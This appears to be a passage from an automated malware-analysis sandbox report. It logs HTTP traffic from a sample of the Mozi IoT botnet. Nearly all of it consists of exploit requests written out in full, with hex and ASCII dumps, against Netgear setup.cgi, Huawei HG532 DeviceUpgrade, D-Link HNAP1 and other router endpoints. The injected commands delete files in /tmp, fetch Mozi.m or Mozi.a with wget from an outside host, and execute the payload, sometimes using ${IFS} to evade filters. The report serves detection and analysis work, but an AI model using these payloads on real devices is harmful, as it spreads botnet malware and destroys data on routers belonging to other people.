4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 25.20.216.191:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 79.57.225.144:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 57.161.137.201:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 165.42.160.13:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 210.2.75.78:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 99.217.234.131:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 206.194.215.132:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 38.112.202.91:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 